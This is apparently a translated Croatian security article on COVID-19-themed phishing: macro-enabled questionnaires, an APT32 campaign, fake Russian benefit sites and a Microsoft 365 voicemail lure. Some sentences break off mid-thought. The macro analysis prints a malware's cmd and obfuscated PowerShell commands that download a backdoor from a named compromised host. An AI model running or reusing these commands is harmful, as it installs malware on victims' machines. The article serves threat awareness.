Napadači nastavljaju iskorištavati temu COVID-19, stvarajući sve više prijetnji za korisnike koji su živo zainteresirani za sve vezano uz epidemiju. U
Sjeti se u
Želite li besplatno testiranje na COVID-19?
Još jedan značajan primjer phishinga na temu koronavirusa bio je
Također je bilo lako uvjeriti većinu korisnika da omoguće makronaredbe. Za to je korišten standardni trik: da biste ispunili upitnik, prvo morate omogućiti makronaredbe, što znači da morate pokrenuti VBA skriptu.
Kao što vidite, VBA skripta je posebno maskirana od antivirusa.
Windows ima značajku čekanja gdje aplikacija čeka /T <sekundi> prije prihvaćanja zadanog odgovora "Da". U našem slučaju, skripta je čekala 65 sekundi prije brisanja privremenih datoteka:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
I dok se čekalo, malware je preuzet. Za to je pokrenuta posebna PowerShell skripta:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Nakon dekodiranja Base64 vrijednosti, skripta PowerShell preuzima backdoor koji se nalazi na prethodno hakiranom web poslužitelju iz Njemačke:
http://automatischer-staubsauger.com/feature/777777.png
i sprema ga pod imenom:
C:UsersPublictmpdirfile1.exe
Mapa ‘C:UsersPublictmpdir’
se briše prilikom pokretanja datoteke 'tmps1.bat' koja sadrži naredbu cmd /c mkdir ""C:UsersPublictmpdir"".
Ciljani napad na vladine agencije
Osim toga, analitičari FireEyea nedavno su izvijestili o ciljanom napadu APT32 usmjerenom na vladine strukture u Wuhanu, kao i na kinesko Ministarstvo upravljanja hitnim situacijama. Jedan od distribuiranih RTF-ova sadržavao je poveznicu na članak New York Timesa pod naslovom
Zanimljivo, u vrijeme otkrivanja niti jedan antivirus nije otkrio ovu instancu, prema Virustotalu.
Kada službene web stranice ne rade
Najupečatljiviji primjer phishing napada dogodio se u Rusiji neki dan. Razlog za to bilo je imenovanje dugo očekivane naknade za djecu od 3 do 16 godina. Kada je 12. svibnja 2020. objavljen početak primanja prijava, milijuni su pohrlili na web stranicu državnih službi po dugo očekivanu pomoć i srušili portal ništa gore od profesionalnog DDoS napada. Kad je predsjednik rekao da se "državne službe ne mogu nositi s protokom prijava", ljudi su na internetu počeli pričati o pokretanju alternativne stranice za prihvaćanje prijava.
Problem je u tome što je nekoliko stranica počelo raditi odjednom, a dok jedna, prava na posobie16.gosuslugi.ru, zapravo prihvaća prijave, više
Kolege iz SearchInform-a pronašli su oko 30 novih lažnih domena u .ru zoni. Tvrtke Infosecurity i Softline pratile su više od 70 sličnih lažnih web stranica državnih službi od početka travnja. Njihovi tvorci manipuliraju poznatim simbolima i također koriste kombinacije riječi gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie i tako dalje.
Hype i društveni inženjering
Svi ovi primjeri samo potvrđuju da napadači uspješno monetiziraju temu koronavirusa. A što su društvene napetosti veće i što su pitanja nejasnija, to su veće šanse da prevaranti ukradu važne podatke, natjeraju ljude da se sami odreknu svog novca ili jednostavno hakiraju više računala.
A s obzirom na to da je pandemija natjerala potencijalno nespremne ljude da masovno rade od kuće, ugroženi su ne samo osobni, već i korporativni podaci. Na primjer, nedavno su korisnici sustava Microsoft 365 (bivši Office 365) također bili izloženi napadu krađe identiteta. Ljudi su primali masovne "propuštene" glasovne poruke kao priloge pismima. Međutim, datoteke su zapravo bile HTML stranica na koju su slane žrtve napada
Izvor: www.habr.com